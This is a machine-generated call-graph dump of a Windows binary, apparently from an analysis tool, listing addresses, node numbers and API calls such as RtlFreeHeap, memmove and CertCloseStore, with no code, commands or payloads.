6cbfa0ed 58 API calls 79360->79494 79495 6cbf779c 26 API calls 79360->79495 79496 6cbf91d1 RtlFreeHeap 79360->79496 79375 6cbe92de 79374->79375 79376 6cbe92e5 79374->79376 79382 6cbe92e3 79375->79382 79526 6cc04b60 26 API calls 79375->79526 79525 6cbe8c80 26 API calls 79376->79525 79379 6cc025d0 26 API calls 79380 6cbe9365 79379->79380 79381 6cbdac4f 79381->79211 79488 6cb95f40 RtlFreeHeap 79381->79488 79382->79379 79382->79381 79384 6cbf7ac8 79383->79384 79385 6cbdac78 79383->79385 79527 6cc02230 26 API calls 79384->79527 79387 6cbdbcd2 79385->79387 79388 6cbdac89 79387->79388 79389 6cbdbce0 79387->79389 79391 6cbdbcf0 79388->79391 79528 6cc02460 26 API calls 79389->79528 79392 6cbdac9d 79391->79392 79393 6cbdbcf7 79391->79393 79392->79231 79394 6cc025d0 26 API calls 79393->79394 79395 6cbdbd07 79394->79395 79529 6cb98959 79396->79529 79400 6cba08c9 79399->79400 79401 6cba0816 79399->79401 79715 6cc02230 26 API calls 79400->79715 79541 6cbf79a1 79401->79541 79409 6cbf79a1 26 API calls 79410 6cba084f 79409->79410 79411 6cba085e 79410->79411 79711 6cbf35a6 26 API calls 79410->79711 79712 6cbc8e3d 61 API calls 79411->79712 79414 6cba089a 79713 6cbc7f88 61 API calls 79414->79713 79416 6cba08af 79422 6cb9fdc2 79421->79422 79423 6cb9fe75 79421->79423 79425 6cbf79a1 26 API calls 79422->79425 79820 6cc02230 26 API calls 79423->79820 79427 6cb9fdd7 79425->79427 79811 6cbac2b2 79427->79811 79444 6cb9fbdf 79443->79444 79445 6cb9fb2e 79443->79445 79966 6cc02230 26 API calls 79444->79966 79446 6cbf79a1 26 API calls 79445->79446 79448 6cb9fb43 79446->79448 79822 6cbc90a8 79448->79822 79453 6cbf79a1 26 API calls 79454 6cb9fb65 79453->79454 79455 6cb9fb74 79454->79455 79962 6cbf35a6 26 API calls 79454->79962 79963 6cbc8d9b 28 API calls 79455->79963 79458 6cb9fbb0 79964 6cbc8599 28 API calls 79458->79964 79460 6cb9fbc5 79461 6cb9fbcc 79460->79461 79462 6cb87a23 RtlFreeHeap 79460->79462 79965 6cb98dcc 75 API calls 79461->79965 79462->79461 79464 6cb9fbd3 79464->79360 79466 6cb9fe34 79465->79466 81679 6cb9752a 79466->81679 79472 6cb9fe34 79471->79472 79473 6cb9752a 68 API calls 79472->79473 79474 6cb9fe39 79473->79474 79475 6cb98c19 92 API calls 79474->79475 79476 6cb9fe69 79475->79476 79476->79360 79478 6cbf6b55 42 API calls 79477->79478 79479 6cb9fe1f 79478->79479 81771 6cb98943 79479->81771 79482->79218 79484->79218 79485->79218 79486->79218 79487->79218 79488->79211 79490->79360 79491->79360 79492->79360 79493->79360 79494->79360 79495->79360 79496->79360 79497->79196 79499 6cbdbc6c 79498->79499 79500 6cbdbcef 79498->79500 81790 6cbf3b29 26 API calls 79499->81790 79500->79273 79502 6cbdbc77 81791 6cb91a80 RtlFreeHeap 79502->81791 79504 6cbdbc82 79505 6cbdbca0 79504->79505 79506 6cbdbc90 79504->79506 79507 6cbdbca2 79504->79507 79508 6cb65ad0 RtlFreeHeap 79505->79508 79506->79505 81792 6cbf63ee RtlFreeHeap 79506->81792 79510 6cbdbcb3 79507->79510 79512 6cb65ad0 RtlFreeHeap 79507->79512 79509 6cbdbcd0 79508->79509 79509->79273 81793 6cbf50ae RtlFreeHeap 79510->81793 79512->79510 79514->79196 79515->79201 79516->79207 79524->79334 79525->79375 79526->79382 79530 6cb9896c 79529->79530 79535 6cb983fc 79530->79535 79532 6cb98973 79533 6cb65ad0 RtlFreeHeap 79532->79533 79534 6cb98984 79533->79534 79534->79360 79537 6cb98403 79535->79537 79536 6cb9840d 79536->79532 79537->79536 79540 6cb97c46 68 API calls 79537->79540 79539 6cb98422 79540->79539 79542 6cbf7511 26 API calls 79541->79542 79543 6cba082b 79542->79543 79544 6cba8469 79543->79544 79545 6cbab00b 79544->79545 79546 6cba848d 79544->79546 79800 6cc022d0 26 API calls 79545->79800 79546->79545 79547 6cba849a 79546->79547 79549 6cbab01d 79547->79549 79550 6cba84a7 79547->79550 79801 6cc025b0 26 API calls 79549->79801 79566 6cba9d58 79550->79566 79594 6cba84c1 79550->79594 79553 6cbc7b4d 33 API calls 79553->79594 79555 6cbab0a9 79803 6cc022d0 26 API calls 79555->79803 79557 6cbaa973 79572 6cbaa978 79557->79572 79765 6cb8aa44 27 API calls 79557->79765 79558 6cbab0bb 79804 6cc025b0 26 API calls 79558->79804 79559 6cba083e 79559->79409 79560 6cbaaa48 79768 6cb997e4 60 API calls 79560->79768 79565 6cbab0c5 79805 6cba8448 RtlFreeHeap 79565->79805 79566->79559 79584 6cb9d9bc 29 API calls 79566->79584 79598 6cbaa90e 79566->79598 79600 6cbc5cc9 29 API calls 79566->79600 79602 6cbaa9d1 79566->79602 79608 6cbaa25b memmove 79566->79608 79614 6cbab027 79566->79614 79620 6cb880d1 26 API calls 79566->79620 79626 6cbd426d 49 API calls 79566->79626 79750 6cb9a7fc 86 API calls 79566->79750 79751 6cbc37c9 45 API calls 79566->79751 79752 6cbdf760 28 API calls 79566->79752 79753 6cbb86c6 48 API calls 79566->79753 79755 6cb979c0 37 API calls 79566->79755 79756 6cbd42dd 49 API calls 79566->79756 79757 6cbd45f8 29 API calls 79566->79757 79758 6cbc3f58 31 API calls 79566->79758 79759 6cb9957f RtlFreeHeap 79566->79759 79760 6cb8c2b3 27 API calls 79566->79760 79761 6cbe6438 27 API calls 79566->79761 79762 6cba3e14 26 API calls 79566->79762 79763 6cb97af4 37 API calls 79566->79763 79764 6cb99539 RtlFreeHeap 79566->79764 79568 6cbaaea4 79579 6cbab0dd 79568->79579 79784 6cbb3a34 54 API calls 79568->79784 79569 6cbaa9c7 79769 6cbc3b60 RtlFreeHeap 79569->79769 79571 6cba8578 memmove 79571->79594 79572->79559 79572->79565 79572->79568 79575 6cbaac14 memmove memmove 79572->79575 79573 6cbab0ce 79806 6cba7ea0 26 API calls 79573->79806 79574 6cbaaa34 79767 6cb892a3 27 API calls 79574->79767 79772 6cbd441a 45 API calls 79575->79772 79576 6cbaa9bf 79576->79569 79585 6cbaab28 79576->79585 79807 6cc022d0 26 API calls 79579->79807 79584->79566 79770 6cb8986f 26 API calls 79585->79770 79587 6cbaaebe 79587->79559 79785 6cbb38af 79587->79785 79588 6cbaacaa 79773 6cb95758 RtlFreeHeap 79588->79773 79592 6cbaacb5 79774 6cbb179d RtlFreeHeap 79592->79774 79594->79553 79594->79555 79594->79557 79594->79558 79594->79571 79594->79572 79595 6cba85f9 memmove 79594->79595 79605 6cbab1e3 79594->79605 79636 6cb86f39 28 API calls 79594->79636 79650 6cba8cbe memmove 79594->79650 79655 6cb8986f 26 API calls 79594->79655 79656 6cc00b07 memcmp 79594->79656 79660 6cbab0f9 79594->79660 79662 6cba8dec memset 79594->79662 79663 6cb87584 2 API calls 79594->79663 79664 6cb9e476 RtlFreeHeap 79594->79664 79666 6cbab126 79594->79666 79670 6cb764aa 26 API calls 79594->79670 79672 6cba94ba memmove 79594->79672 79675 6cb65ad0 RtlFreeHeap 79594->79675 79677 6cb79c18 28 API calls 79594->79677 79678 6cb807d0 RtlFreeHeap 79594->79678 79679 6cb6747b 27 API calls 79594->79679 79684 6cb7e54a WaitOnAddress GetLastError 79594->79684 79685 6cba9941 memmove 79594->79685 79692 6cb7f833 27 API calls 79594->79692 79697 6cbaafbd 79594->79697 79698 6cbc5e22 57 API calls 79594->79698 79700 6cb947fc WakeByAddressSingle 79594->79700 79702 6cbb8415 38 API calls 79594->79702 79710 6cba71e2 46 API calls 79594->79710 79716 6cbb86c6 48 API calls 79594->79716 79718 6cb8393c 27 API calls 79594->79718 79719 6cb870bf 28 API calls 79594->79719 79720 6cb97af4 37 API calls 79594->79720 79721 6cbc68cb RtlFreeHeap 79594->79721 79722 6cb7d702 27 API calls 79594->79722 79723 6cb67822 memcmp 79594->79723 79724 6cb86cda 28 API calls 79594->79724 79725 6cb88465 29 API calls 79594->79725 79726 6cb882e1 28 API calls 79594->79726 79727 6cbc68e1 RtlFreeHeap 79594->79727 79728 6cb7f06c 28 API calls 79594->79728 79729 6cb8080b RtlFreeHeap 79594->79729 79730 6cb7fc11 27 API calls 79594->79730 79731 6cb97bf2 RtlFreeHeap 79594->79731 79732 6cb75bde RtlFreeHeap 79594->79732 79733 6cb7e263 26 API calls 79594->79733 79734 6cb97ad1 31 API calls 79594->79734 79735 6cbac914 31 API calls 79594->79735 79736 6cbc3b43 31 API calls 79594->79736 79737 6cb7e6a0 26 API calls 79594->79737 79738 6cb83cb8 RtlFreeHeap 79594->79738 79739 6cb79d0b RtlFreeHeap 79594->79739 79740 6cb75c24 RtlFreeHeap 79594->79740 79741 6cb7770f RtlFreeHeap 79594->79741 79742 6cb77748 28 API calls 79594->79742 79743 6cbcf84c RtlFreeHeap 79594->79743 79745 6cbcf938 27 API calls 79594->79745 79746 6cb76423 26 API calls 79594->79746 79747 6cb7e7a3 26 API calls 79594->79747 79748 6cb76c0c 26 API calls 79594->79748 79749 6cb76a6d 29 API calls 79594->79749 79717 6cb8393c 27 API calls 79595->79717 79598->79559 79598->79602 79771 6cb897c1 26 API calls 79598->79771 79600->79566 79602->79560 79602->79572 79766 6cb89744 27 API calls 79602->79766 79754 6cbb84f3 26 API calls 79608->79754 79611 6cbaaccd 79802 6cc02230 26 API calls 79614->79802 79620->79566 79626->79566 79636->79594 79650->79594 79655->79594 79656->79594 79809 6cc024e0 26 API calls 79660->79809 79662->79594 79663->79594 79664->79594 79808 6cc024e0 26 API calls 79666->79808 79670->79594 79672->79594 79675->79594 79677->79594 79678->79594 79679->79594 79684->79594 79685->79594 79686 6cba9aba memmove memmove 79685->79686 79744 6cb7615f 30 API calls 79686->79744 79692->79594 79697->79572 79796 6cbac914 31 API calls 79697->79796 79698->79594 79700->79594 79701 6cbaafe1 79797 6cbc3b43 31 API calls 79701->79797 79702->79594 79704 6cbaafe9 79798 6cba71e2 46 API calls 79704->79798 79707 6cbaaff1 79799 6cb97af4 37 API calls 79707->79799 79710->79594 79711->79411 79712->79414 79713->79416 79716->79594 79717->79594 79718->79594 79719->79594 79720->79594 79722->79594 79723->79594 79724->79594 79725->79594 79726->79594 79728->79594 79729->79594 79730->79594 79731->79594 79732->79594 79733->79594 79734->79594 79735->79594 79736->79594 79737->79594 79738->79594 79739->79594 79740->79594 79743->79594 79744->79594 79746->79594 79747->79594 79748->79594 79749->79594 79751->79566 79752->79566 79753->79566 79754->79566 79755->79566 79756->79566 79759->79566 79760->79566 79761->79566 79762->79566 79763->79566 79764->79566 79765->79576 79766->79574 79767->79560 79768->79572 79769->79572 79770->79598 79771->79602 79772->79588 79773->79592 79774->79611 79784->79587 79786 6cbb38d7 79785->79786 79788 6cbb38ba 79785->79788 79787 6cbb38e5 79786->79787 79810 6cbb381e RtlFreeHeap 79786->79810 79790 6cb65ad0 RtlFreeHeap 79787->79790 79788->79786 79791 6cb65ad0 RtlFreeHeap 79788->79791 79791->79786 79796->79701 79797->79704 79798->79707 79799->79572 79805->79573 79806->79579 79810->79787 79812 6cbac327 79811->79812 79821 6cc022d0 26 API calls 79812->79821 79823 6cbc90db memmove 79822->79823 79826 6cbc90c8 79822->79826 79823->79826 79824 6cbca337 79825 6cc02860 26 API calls 79824->79825 79828 6cbca341 79825->79828 79826->79824 79827 6cbc9152 79826->79827 79830 6cc025d0 26 API calls 79826->79830 79852 6cbc9e01 79826->79852 79953 6cbc916f 79827->79953 81047 6cbf422a 45 API calls 79827->81047 81102 6cc025b0 26 API calls 79828->81102 79830->79827 79832 6cbca34b 81103 6cc025b0 26 API calls 79832->81103 79833 6cbca303 81100 6cc025b0 26 API calls 79833->81100 79834 6cbc9167 79836 6cbc9de3 79834->79836 79834->79953 81070 6cbacfd5 27 API calls 79836->81070 79839 6cbca30d 81101 6cc024e0 26 API calls 79839->81101 79843 6cbc9dfa 81071 6cbb18ef RtlFreeHeap 79843->81071 79844 6cbc9e26 81078 6cbacfd5 27 API calls 79844->81078 79845 6cbca11b 79845->79828 79861 6cbca1c9 79845->79861 79874 6cbca180 79845->79874 79846 6cbc9f4c 79850 6cbc675a 26 API calls 79846->79850 79847 6cbc9e58 81075 6cbacfd5 27 API calls 79847->81075 79855 6cbc9f59 79850->79855 79852->79833 79852->79845 79875 6cb9fb56 79852->79875 79854 6cbc9eec 79858 6cb87564 26 API calls 79854->79858 79855->79832 79855->79875 79881 6cbc9f6e 79855->79881 79856 6cbc9e67 81076 6cbb18ef RtlFreeHeap 79856->81076 79862 6cbc9f0c 79858->79862 79860 6cbc9e0f 79860->79846 79860->79852 79867 6cbca20e 79861->79867 79868 6cbca203 79861->79868 81079 6cbb4390 26 API calls 79862->81079 79864 6cbca2dc 81099 6cbf79d5 26 API calls 79864->81099 81092 6cb75bde RtlFreeHeap 79867->81092 81091 6cbc8731 RtlFreeHeap 79868->81091 79870 6cbc9fa9 81098 6cbf79d5 26 API calls 79870->81098 79871 6cbca253 79871->79875 81097 6cb97ed5 RtlFreeHeap 79871->81097 81096 6cbc8665 27 API calls 79874->81096 79875->79453 79876 6cbca219 81093 6cbdf4eb RtlFreeHeap 79876->81093 79877 6cbc92d3 81074 6cbb1800 26 API calls 79877->81074 79881->79864 79881->79870 79882 6cbca221 81094 6cb995c9 46 API calls 79882->81094 79883 6cbc9e3e 81073 6cbacf6e 46 API calls 79883->81073 79886 6cbca22c 81095 6cb95758 RtlFreeHeap 79886->81095 79889 6cbca23a 79891 6cbc9e19 81072 6cb95758 RtlFreeHeap 79891->81072 79893 6cbacc10 27 API calls 79893->79953 79894 6cbb1676 memcmp 79894->79953 79895 6cb7dc9a RtlFreeHeap memmove memmove memmove 79895->79953 79897 6cbc9e90 81077 6cb95758 RtlFreeHeap 79897->81077 79898 6cbc9fec 81081 6cbacfd5 27 API calls 79898->81081 79900 6cbacb9d 26 API calls 79900->79953 79901 6cbacfd5 27 API calls 79901->79953 79902 6cba8072 47 API calls 79902->79953 79903 6cbc9e87 79903->79897 79903->79898 79906 6cbacc70 27 API calls 79906->79953 79907 6cbca025 81082 6cbb18c5 26 API calls 79907->81082 79910 6cbca030 81083 6cbb18ef RtlFreeHeap 79910->81083 79912 6cbca03a 81084 6cb95758 RtlFreeHeap 79912->81084 79913 6cbfb783 26 API calls 79913->79953 79917 6cbc9453 memmove 81051 6cbb7e80 33 API calls 79917->81051 79918 6cbc9fe7 81090 6cbad05a 30 API calls 79918->81090 79921 6cbacbca memcmp 79921->79953 79923 6cbfb6df 26 API calls 79923->79953 79924 6cbb8a77 31 API calls 79924->79953 79925 6cb9796c RtlFreeHeap 79925->79953 79926 6cbca058 81085 6cbb1af5 26 API calls 79926->81085 79927 6cbca077 81086 6cbacfd5 27 API calls 79927->81086 79931 6cbc9fd3 81080 6cb75bde RtlFreeHeap 79931->81080 79934 6cbca08b 81087 6cbb1af5 26 API calls 79934->81087 79935 6cb95758 RtlFreeHeap 79935->79953 79938 6cbca092 81088 6cbb17d1 26 API calls 79938->81088 79941 6cbca0a7 81089 6cbb18ef RtlFreeHeap 79941->81089 79942 6cbb35f1 27 API calls 79942->79953 79946 6cba7f31 RtlFreeHeap memmove memmove memmove memmove 79946->79953 79947 6cbaccb0 28 API calls 79947->79953 79948 6cb86f39 28 API calls 79948->79953 79950 6cbc9d3c memmove 81066 6cbb7e80 33 API calls 79950->81066 79953->79839 79953->79844 79953->79860 79953->79877 79953->79883 79953->79891 79953->79893 79953->79894 79953->79895 79953->79897 79953->79898 79953->79900 79953->79901 79953->79902 79953->79903 79953->79906 79953->79913 79953->79921 79953->79923 79953->79924 79953->79925 79953->79926 79953->79927 79953->79931 79953->79935 79953->79942 79953->79946 79953->79947 79953->79948 79967 6cbb493f 79953->79967 80149 6cbb481f 79953->80149 80339 6cbb4852 79953->80339 80516 6cbb491e 79953->80516 80693 6cbb48d4 79953->80693 80870 6cbb4930 79953->80870 81048 6cb870bf 28 API calls 79953->81048 81049 6cbacfbe RtlFreeHeap 79953->81049 81050 6cb75bde RtlFreeHeap 79953->81050 81052 6cbad122 RtlFreeHeap 79953->81052 81053 6cb7d702 27 API calls 79953->81053 81054 6cba726c RtlFreeHeap 79953->81054 81055 6cbfb884 30 API calls 79953->81055 81056 6cbfb7b9 29 API calls 79953->81056 81057 6cbfad16 26 API calls 79953->81057 81058 6cc00595 memcmp 79953->81058 81059 6cbac71f 27 API calls 79953->81059 81060 6cb86a4f 29 API calls 79953->81060 81061 6cbb16e4 26 API calls 79953->81061 81062 6cbb3599 memcmp 79953->81062 81063 6cb86cda 28 API calls 79953->81063 81064 6cb89f99 26 API calls 79953->81064 81065 6cb75bde RtlFreeHeap 79953->81065 81067 6cba726c RtlFreeHeap 79953->81067 81068 6cb75bde RtlFreeHeap 79953->81068 81069 6cbad05a 30 API calls 79953->81069 79962->79455 79963->79458 79964->79460 79965->79464 79968 6cbb4974 79967->79968 79969 6cc02860 26 API calls 79967->79969 79970 6cc02860 26 API calls 79968->79970 79969->79968 79971 6cbb497e 79970->79971 79972 6cc025d0 26 API calls 79971->79972 79973 6cbb4990 memmove 79972->79973 81104 6cbb7986 79973->81104 80150 6cbb482b 80149->80150 80151 6cbb4860 memmove memmove 80149->80151 80152 6cbb4960 80150->80152 80153 6cbb4834 80150->80153 81411 6cbb7938 80151->81411 80156 6cc02860 26 API calls 80152->80156 80153->80151 80155 6cbb48cf 80157 6cbb4990 memmove 80155->80157 80158 6cbb496a 80156->80158 80159 6cbb7986 26 API calls 80157->80159 80160 6cc02860 26 API calls 80158->80160 80161 6cbb49c9 memmove memmove 80159->80161 80162 6cbb4974 80160->80162 80163 6cbb4a15 memmove memmove 80161->80163 80164 6cc02860 26 API calls 80162->80164 80316 6cbb4a9f 80163->80316 80165 6cbb497e 80164->80165 80166 6cc025d0 26 API calls 80165->80166 80166->80157 80340 6cbb4a15 memmove memmove 80339->80340 80450 6cbb4a9f 80340->80450 80341 6cbb7822 81512 6cc04918 26 API calls 80341->81512 80343 6cbb7836 81513 6cc024e0 26 API calls 80343->81513 80345 6cbb7c54 2 API calls 80345->80450 80346 6cbb785e 81514 6cc022d0 26 API calls 80346->81514 80348 6cbb7986 26 API calls 80348->80450 80349 6cb8bf6a 3 API calls 80349->80450 80351 6cbb78aa 80353 6cc025d0 26 API calls 80351->80353 80352 6cb8c01e 4 API calls 80352->80450 80411 6cbb5c06 80353->80411 80354 6cbb4c30 memmove 81467 6cb6747b 27 API calls 80354->81467 80355 6cbb4d25 memmove 80356 6cb85479 2 API calls 80355->80356 80358 6cbb4d5f 80356->80358 80358->80343 80360 6cbb4d68 memmove memmove memmove 80358->80360 80363 6cba2d0f 41 API calls 80360->80363 80363->80450 80366 6cbb4fdf memmove memmove 80369 6cba5400 28 API calls 80366->80369 80367 6cbb4cc6 memmove 80367->80450 80369->80450 80370 6cbba440 296 API calls 80370->80450 80371 6cb97cc2 RtlFreeHeap 80371->80450 80372 6cbb4f17 memmove 81470 6cbba6e7 26 API calls 80372->81470 80373 6cb98216 26 API calls 80373->80450 80375 6cbb50bd memmove 81472 6cbb79a3 28 API calls 80375->81472 80377 6cbb5b0a 80377->79953 80379 6cbb532a memmove 80381 6cbb5a79 80379->80381 80383 6cbb536d memmove 80379->80383 80380 6cbb57dd memmove 80384 6cbb5aab memmove 80380->80384 80380->80450 80381->80384 80382 6cbb79bb 28 API calls 80382->80450 80387 6cbba440 296 API calls 80383->80387 80385 6cbb5ad2 80384->80385 80386 6cbb5b84 80384->80386 80388 6cb87564 26 API calls 80385->80388 80390 6cbb5b89 memmove 80386->80390 80387->80450 80391 6cbb5aed memmove 80388->80391 80389 6cba2d0f 41 API calls 80389->80450 80392 6cbf7511 26 API calls 80390->80392 80391->80377 80393 6cbb5bb3 80392->80393 80395 6cbb5bbb 80393->80395 80396 6cbb78c0 80393->80396 80405 6cbb3e5f 27 API calls 80405->80450 80407 6cbb38af RtlFreeHeap 80407->80450 80410 6cbb7ad4 56 API calls 80410->80450 80411->80377 81519 6cc04295 26 API calls 80411->81519 80416 6cbb6109 memmove 80416->80450 80417 6cbb7053 80433 6cb98282 RtlFreeHeap 80417->80433 80421 6cba563d 26 API calls 80421->80450 80425 6cbb61f4 memmove 80425->80450 80427 6cbb707c 81502 6cbb3e2c RtlFreeHeap 80427->81502 80429 6cbb637f 81496 6cb88a59 RtlFreeHeap memcmp 80429->81496 80430 6cbb6156 memmove 81490 6cbb828e 28 API calls 80430->81490 80441 6cbb70a1 80433->80441 80434 6cbb6222 memmove 81492 6cbb828e 28 API calls 80434->81492 80435 6cbb7938 26 API calls 80435->80450 80449 6cb97cc2 RtlFreeHeap 80441->80449 80444 6cbb64c9 memmove 80444->80450 80447 6cbb6386 80447->79953 80448 6cbb62a7 memmove 81493 6cba7034 35 API calls 80448->81493 80453 6cbb70ac 80449->80453 80450->80341 80450->80345 80450->80346 80450->80348 80450->80349 80450->80351 80450->80352 80450->80354 80450->80355 80450->80366 80450->80367 80450->80370 80450->80371 80450->80372 80450->80373 80450->80375 80450->80377 80450->80379 80450->80380 80450->80381 80450->80382 80450->80389 80450->80405 80450->80407 80450->80410 80450->80411 80450->80417 80450->80421 80450->80425 80450->80427 80450->80429 80450->80435 80450->80444 80450->80448 80451 6cb98282 RtlFreeHeap 80450->80451 80452 6cbb651a memmove 80450->80452 80454 6cbb630a memmove 80450->80454 80462 6cb89744 27 API calls 80450->80462 80463 6cb98282 RtlFreeHeap 80450->80463 80465 6cbb638b memmove 80450->80465 80468 6cbb388f 56 API calls 80450->80468 80470 6cbb6430 memmove 80450->80470 80476 6cbb77d4 80450->80476 80477 6cb83ca2 27 API calls 80450->80477 80480 6cbb77e6 80450->80480 80482 6cc00b07 memcmp 80450->80482 80483 6cbac71f 27 API calls 80450->80483 80484 6cbd4cdc 28 API calls 80450->80484 80487 6cba6fce 36 API calls 80450->80487 80488 6cbb8360 39 API calls 80450->80488 80489 6cbb77f8 80450->80489 80490 6cbb6b5a memmove 80450->80490 80493 6cbb70dc memmove 80450->80493 80494 6cbb7870 80450->80494 80495 6cbb7810 80450->80495 80496 6cba7034 35 API calls 80450->80496 80500 6cb8a1f2 26 API calls 80450->80500 80501 6cb89472 RtlFreeHeap 80450->80501 80504 6cbf7511 26 API calls 80450->80504 80505 6cbb78e9 80450->80505 80507 6cb87564 26 API calls 80450->80507 80509 6cbb78db 80450->80509 80511 6cbf76c0 26 API calls 80450->80511 80513 6cbf5ac8 42 API calls 80450->80513 80514 6cba51b7 40 API calls 80450->80514 80515 6cbf6b55 42 API calls 80450->80515 81468 6cb841ec 27 API calls 80450->81468 81469 6cb8bf3b RtlFreeHeap 80450->81469 81471 6cb9a10e RtlFreeHeap 80450->81471 81473 6cb88cf0 42 API calls 80450->81473 81474 6cbf57d8 40 API calls 80450->81474 81475 6cb8a193 RtlFreeHeap 80450->81475 81476 6cb8690a 29 API calls 80450->81476 81477 6cb85c69 26 API calls 80450->81477 81478 6cbaf794 27 API calls 80450->81478 81483 6cc030ed 40 API calls 80450->81483 81484 6cbb1b74 28 API calls 80450->81484 81485 6cb95758 RtlFreeHeap 80450->81485 81486 6cb85c86 26 API calls 80450->81486 81487 6cb88bbd 26 API calls 80450->81487 81488 6cba10db 46 API calls 80450->81488 81489 6cbd4b7b 26 API calls 80450->81489 81491 6cbd4b7b 26 API calls 80450->81491 81495 6cb845b8 26 API calls 80450->81495 81501 6cbb3e2c RtlFreeHeap 80450->81501 81504 6cbb435e 26 API calls 80450->81504 81505 6cb88e44 26 API calls 80450->81505 81506 6cb97c46 68 API calls 80450->81506 81507 6cbc2d2f 68 API calls 80450->81507 80456 6cbb6f74 memmove 80451->80456 80452->80450 81503 6cbb7b41 RtlFreeHeap CertCloseStore 80453->81503 81494 6cba7034 35 API calls 80454->81494 80460 6cbb38af RtlFreeHeap 80456->80460 80466 6cbb6f9f memmove 80460->80466 80462->80450 80463->80450 81497 6cbb8335 27 API calls 80465->81497 80469 6cbb4990 memmove 80466->80469 80468->80450 80474 6cbb7986 26 API calls 80469->80474 81499 6cbb8335 27 API calls 80470->81499 80472 6cbb63c2 memmove 81498 6cbb3bfc 37 API calls 80472->81498 80479 6cbb49c9 memmove memmove 80474->80479 81508 6cc022d0 26 API calls 80476->81508 80477->80450 80478 6cbb6467 memmove 81500 6cbb3bfc 37 API calls 80478->81500 80479->80340 81509 6cc022d0 26 API calls 80480->81509 80482->80450 80483->80450 80484->80450 80487->80450 80488->80450 81510 6cc022d0 26 API calls 80489->81510 80490->80450 80493->80450 81515 6cc024e0 26 API calls 80494->81515 81511 6cc04918 26 API calls 80495->81511 80496->80450 80500->80450 80501->80450 80504->80450 81518 6cb97c46 68 API calls 80505->81518 80507->80450 81517 6cbc2d2f 68 API calls 80509->81517 80511->80450 80513->80450 80514->80450 80515->80450 80691 6cbb4a9f 80516->80691 80517 6cbb7986 26 API calls 80517->80691 80518 6cbb7822 81565 6cc04918 26 API calls 80518->81565 80520 6cbb7836 81566 6cc024e0 26 API calls 80520->81566 80522 6cbb7c54 2 API calls 80522->80691 80523 6cbb785e 81567 6cc022d0 26 API calls 80523->81567 80525 6cbb7870 81568 6cc024e0 26 API calls 80525->81568 80526 6cb8bf6a 3 API calls 80526->80691 80528 6cbb78aa 80530 6cc025d0 26 API calls 80528->80530 80529 6cb8c01e 4 API calls 80529->80691 80681 6cbb5c06 80530->80681 80531 6cbb4c30 memmove 81520 6cb6747b 27 API calls 80531->81520 80532 6cbb4d25 memmove 80533 6cb85479 2 API calls 80532->80533 80535 6cbb4d5f 80533->80535 80535->80520 80537 6cbb4d68 memmove memmove memmove 80535->80537 80540 6cba2d0f 41 API calls 80537->80540 80540->80691 80543 6cbb4fdf memmove memmove 80546 6cba5400 28 API calls 80543->80546 80544 6cbb4cc6 memmove 80544->80691 80546->80691 80547 6cbba440 296 API calls 80547->80691 80548 6cb97cc2 RtlFreeHeap 80548->80691 80549 6cbb4f17 memmove 81523 6cbba6e7 26 API calls 80549->81523 80550 6cb98216 26 API calls 80550->80691 80552 6cbb50bd memmove 81525 6cbb79a3 28 API calls 80552->81525 80554 6cbb5b0a 80554->79953 80556 6cbb532a memmove 80558 6cbb5a79 80556->80558 80559 6cbb536d memmove 80556->80559 80557 6cbb57dd memmove 80560 6cbb5aab memmove 80557->80560 80557->80691 80558->80560 80563 6cbba440 296 API calls 80559->80563 80561 6cbb5ad2 80560->80561 80562 6cbb5b84 80560->80562 80564 6cb87564 26 API calls 80561->80564 80566 6cbb5b89 memmove 80562->80566 80563->80691 80567 6cbb5aed memmove 80564->80567 80565 6cba2d0f 41 API calls 80565->80691 80569 6cbf7511 26 API calls 80566->80569 80567->80554 80568 6cbb3e5f 27 API calls 80568->80691 80570 6cbb5bb3 80569->80570 80573 6cbb5bbb 80570->80573 80574 6cbb78c0 80570->80574 80572 6cbb79bb 28 API calls 80572->80691 80575 6cbf76c0 26 API calls 80573->80575 81569 6cbba6e7 26 API calls 80574->81569 80576 6cba563d 26 API calls 80576->80691 80585 6cbb38af RtlFreeHeap 80585->80691 80588 6cbb7ad4 56 API calls 80588->80691 80592 6cbb7938 26 API calls 80592->80691 80594 6cbb6109 memmove 80594->80691 80595 6cbb7053 80611 6cb98282 RtlFreeHeap 80595->80611 80602 6cbb61f4 memmove 80602->80691 80604 6cbb707c 81555 6cbb3e2c RtlFreeHeap 80604->81555 80606 6cbb637f 81549 6cb88a59 RtlFreeHeap memcmp 80606->81549 80607 6cbb6156 memmove 81543 6cbb828e 28 API calls 80607->81543 80608 6cb8a1f2 26 API calls 80608->80691 80619 6cbb70a1 80611->80619 80612 6cbb6222 memmove 81545 6cbb828e 28 API calls 80612->81545 80617 6cb89472 RtlFreeHeap 80617->80691 80627 6cb97cc2 RtlFreeHeap 80619->80627 80622 6cbb64c9 memmove 80622->80691 80625 6cbb6386 80625->79953 80626 6cbb62a7 memmove 81546 6cba7034 35 API calls 80626->81546 80630 6cbb70ac 80627->80630 80628 6cb98282 RtlFreeHeap 80633 6cbb6f74 memmove 80628->80633 80629 6cbb651a memmove 80629->80691 81556 6cbb7b41 RtlFreeHeap CertCloseStore 80630->81556 80631 6cbb630a memmove 81547 6cba7034 35 API calls 80631->81547 80637 6cbb38af RtlFreeHeap 80633->80637 80643 6cbb6f9f memmove 80637->80643 80639 6cb98282 RtlFreeHeap 80639->80691 80640 6cb83ca2 27 API calls 80640->80691 80642 6cbb638b memmove 81550 6cbb8335 27 API calls 80642->81550 80645 6cbb4990 memmove 80643->80645 80650 6cbb7986 26 API calls 80645->80650 80646 6cbb6430 memmove 81552 6cbb8335 27 API calls 80646->81552 80648 6cbb63c2 memmove 81551 6cbb3bfc 37 API calls 80648->81551 80654 6cbb49c9 memmove memmove 80650->80654 80652 6cbb77d4 81561 6cc022d0 26 API calls 80652->81561 80653 6cbb6467 memmove 81553 6cbb3bfc 37 API calls 80653->81553 80659 6cbb4a15 memmove memmove 80654->80659 80655 6cbb77e6 81562 6cc022d0 26 API calls 80655->81562 80656 6cbd4cdc 28 API calls 80656->80691 80658 6cc00b07 memcmp 80658->80691 80659->80691 80662 6cba6fce 36 API calls 80662->80691 80663 6cbb8360 39 API calls 80663->80691 80664 6cbb77f8 81563 6cc022d0 26 API calls 80664->81563 80665 6cbb6b5a memmove 80665->80691 80668 6cbb70dc memmove 80668->80691 80669 6cbb7810 81564 6cc04918 26 API calls 80669->81564 80670 6cba7034 35 API calls 80670->80691 80671 6cbac71f 27 API calls 80671->80691 80675 6cb89744 27 API calls 80675->80691 80676 6cbb388f 56 API calls 80676->80691 80679 6cbb78e9 81571 6cb97c46 68 API calls 80679->81571 